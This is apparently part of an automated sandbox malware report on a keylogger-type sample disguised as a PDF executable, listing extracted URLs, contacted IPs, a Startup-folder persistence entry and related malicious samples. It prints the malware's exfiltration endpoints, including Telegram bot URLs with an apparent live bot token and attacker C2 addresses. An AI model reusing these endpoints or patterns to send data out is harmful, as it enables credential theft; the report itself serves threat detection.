https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:49:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20and%20Time:%2013/01/2025%20/%2021:00:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20960781%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designersG	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/?	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn/bThe	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers?	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.tiro.com	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV2.C:	edb.log.4.dr	false	high
http://www.fontbureau.com/designers	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.goodfont.co.kr	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sajatypeworks.com	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.typography.netD	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/Prod.C:	edb.log.4.dr	false	high
http://www.founder.com.cn/cn/cThe	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/staff/dennis.htm	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV2	edb.log.4.dr	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.galapagosdesign.com/DPlease	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fonts.com	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sandoll.co.kr	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.urwpp.deDPlease	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.zhongyicts.com.cn	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000001.00000002.1698162962.0000000004FE1000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1832407951.0000000004DE1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.sakkal.com	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.4.dr, edb.log.4.dr	false	high
https://reallyfreegeoip.org/xml/	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	high
https://www.office.com/	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000001.00000002.1709103269.0000000006049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000006.00000002.1842411837.0000000005E4B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://crl.ver)	svchost.exe, 00000004.00000002.3334847823.0000023633000000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot7199790900:AAH-a-1uulA8aVgkku_Nct-9FyNkWwIUg_U/sendDocument?chat_id=7437	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000037E1000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003231000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E3000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004A06000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000473F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000047B4000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004931000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478D000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041DE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004205000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004190000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004334000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004457000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004382000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000006.00000002.1832407951.0000000004F32000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.carterandcone.coml	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/cabarga.htmlN	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.founder.com.cn/cn	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers/frere-user.html	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000376C000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000031BB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96	svchost.exe, 00000004.00000003.1707895013.00000236332C2000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false	high
http://anotherarmy.dns.army:8081	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4126496252.0000000000434000.00000040.00000400.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003661000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.00000000030B1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.jiyu-kobo.co.jp/	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036DA000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.000000000312B000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.0000000003747000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.000000000371F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4136393231.00000000036B0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003101000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003170000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4135735189.0000000003198000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.fontbureau.com/designers8	PDF-3093900299039 pdf.exe, 00000000.00000002.4164221675.0000000006D42000.00000004.00000800.00020000.00000000.sdmp	false	high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000478F000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.000000000471A000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048E9000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.0000000004745000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000049E2000.00000004.00000800.00020000.00000000.sdmp, PDF-3093900299039 pdf.exe, 00000003.00000002.4167198777.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000430F000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004432000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.00000000041E0000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.0000000004196000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000433A000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4165113558.000000000416B000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	PDF-3093900299039 pdf.exe, 00000000.00000002.4145420741.0000000003829000.00000004.00000800.00020000.00000000.sdmp, audiomaximizer.exe, 00000008.00000002.4126507795.0000000000435000.00000040.00000400.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.32.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589962
Start date and time:	2025-01-13 12:07:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PDF-3093900299039 pdf.exe
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.evad.winEXE@13/12@3/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 100% Number of executed functions: 228 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 2.23.242.162, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 3260 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
06:08:04	API Interceptor	5x Sleep call for process: powershell.exe modified
06:08:05	API Interceptor	3x Sleep call for process: svchost.exe modified
06:08:09	API Interceptor	7797610x Sleep call for process: PDF-3093900299039 pdf.exe modified
06:08:20	API Interceptor	7040495x Sleep call for process: audiomaximizer.exe modified
11:08:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	c7WJL1gt32.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	MBOaS3GRtF.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	uVpytXGpQz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
149.154.167.220	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.80.1
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.64.1
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.112.1
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.64.1
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.48.1
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.112.1
api.telegram.org	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://terrific-metal-countess.glitch.me/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	6uPVRnocVS.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Udzp7lL5ns.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	Exodus.txt.lnk	Get hash	malicious	StormKitty	Browse	149.154.167.220
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	x8M2g1Xxhz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
checkip.dyndns.com	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	QUOTATION#090125-ELITEMARINE.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Order_list.scr.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Receipt-2502-AJL2024.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	nfKqna8HuC.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	mnXS9meqtB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	193.122.6.168
	aS39AS7b0P.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	gGI2gVBI0f.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	ZpYFG94D4C.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	h8izmpp1ZM.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.130.0

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	FA_35_01_2025_STA_Wz#U00f3r_standard_pdf .scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	https://ngk.ae/hurda.html?email=lara.sutton@southerntrust.hscni.net	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	UWYXurYZ2x.exe	Get hash	malicious	LummaC, Amadey, Babadeda, DanaBot, KeyLogger, LummaC Stealer, Poverty Stealer	Browse	149.154.167.99
	http://www.eovph.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
	http://www.eghwr.icu/	Get hash	malicious	Unknown	Browse	149.154.167.99
